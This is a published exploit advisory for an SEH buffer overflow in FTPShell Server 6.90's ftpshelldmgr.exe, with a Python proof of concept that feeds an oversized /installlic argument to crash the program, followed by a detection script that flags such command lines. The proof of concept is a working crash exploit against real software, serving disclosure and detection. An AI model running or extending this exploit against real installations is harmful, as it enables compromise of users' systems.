Exploit/Advisories

Published on July 2nd, 2020

FTPShell Server 6.90 Buffer Overflow ≈ Packet Storm

# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)
# Exploit Author: Saeed reza Zamanian
# Date: 2020-07-01
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date : Jan 31, 2020
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# Tested On: Windows Vista SP2 -- build 6002 32-bit
#
# Replicate Crash:
# 1) Download and install the application
# 2) Execute the exploit (with administrative permissions)
# 3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)

# SEH chain of main thread
# Address SE handler
# 0020FBFC 43434343
# 42424242 *** CORRUPT ENTRY ***

#!/usr/bin/python
import os

directory = 'C:\\Program Files\\FTPShellServer\\' #default
#directory = 'C:\\Program Files (x86)\\FTPShellServer\\' #directory_for_x64

# 1112 bytes of filler reach the SEH record: the next 4 bytes land on nSEH
# and the 4 after that on the SE handler (see the 42424242 / 43434343 SEH chain above)
offset = '\x41'*1112
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'

payload = offset+nSEH+SEH

try:
    print("[+] Creating %s byte payload and sending it." %len(payload))
    # the overflow is triggered through the /installlic command-line argument
    comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)
    stream = os.popen(comm)
    output = stream.read()
    print("[+] payload sent!")
except:
    print("Failed.")
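Detection-side companion, added here and not part of the advisory or the vendor's code: a triage function for process-creation command lines (Sysmon Event ID 1 / Security 4688 style) that flags ftpshelldmgr.exe /installlic invocations whose argument is long enough to reach the 1112-byte nSEH offset given above. The sample command lines and the 256-character "suspicious" threshold are constructed assumptions.

```python
import re

# Offset from the advisory: 1112 filler bytes reach nSEH, the next 4 the SE handler.
SEH_OFFSET = 1112
# Assumed triage threshold: a licence key is a few dozen characters, so anything
# longer is worth a look even if it stops short of the SEH record.
SUSPICIOUS_LENGTH = 256

# Matches "ftpshelldmgr.exe ... /installlic <arg>" in a raw Windows command line,
# with or without quoting around the image path.
_INSTALLLIC_RE = re.compile(r'ftpshelldmgr\.exe"?.*?/installlic\s+(\S+)', re.IGNORECASE)

# Constructed sample process-creation command lines; the last two mimic the PoC shape.
SAMPLE_COMMAND_LINES = [
    r'"C:\Program Files\FTPShellServer\ftpshelldmgr.exe"',
    r'"C:\Program Files\FTPShellServer\ftpshelldmgr.exe" /installlic ABCD-1234-EFGH-5678',
    r'"C:\Program Files\FTPShellServer\ftpshelldmgr.exe" /installlic ' + 'A' * 1112 + 'BBBBCCCC',
    r'cmd.exe /c cd C:\Program Files\FTPShellServer && ftpshelldmgr.exe /installlic ' + 'A' * 2000,
]


def installlic_argument(cmdline):
    """Return the /installlic argument, or None if this is not such an invocation."""
    m = _INSTALLLIC_RE.search(cmdline)
    return m.group(1) if m else None


def classify(cmdline):
    """Label a command line: ignore / benign / suspicious / seh_overwrite."""
    arg = installlic_argument(cmdline)
    if arg is None:
        return 'ignore'
    if len(arg) >= SEH_OFFSET:
        return 'seh_overwrite'    # enough bytes to clobber nSEH and the SE handler
    if len(arg) >= SUSPICIOUS_LENGTH:
        return 'suspicious'
    return 'benign'


def triage(cmdlines):
    """Return (label, argument length) per command line, for an alerting pipeline."""
    return [(classify(c), len(installlic_argument(c) or '')) for c in cmdlines]


if __name__ == '__main__':
    for line, (label, n) in zip(SAMPLE_COMMAND_LINES, triage(SAMPLE_COMMAND_LINES)):
        print('%-14s %5d  %s' % (label, n, line[:60]))
```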
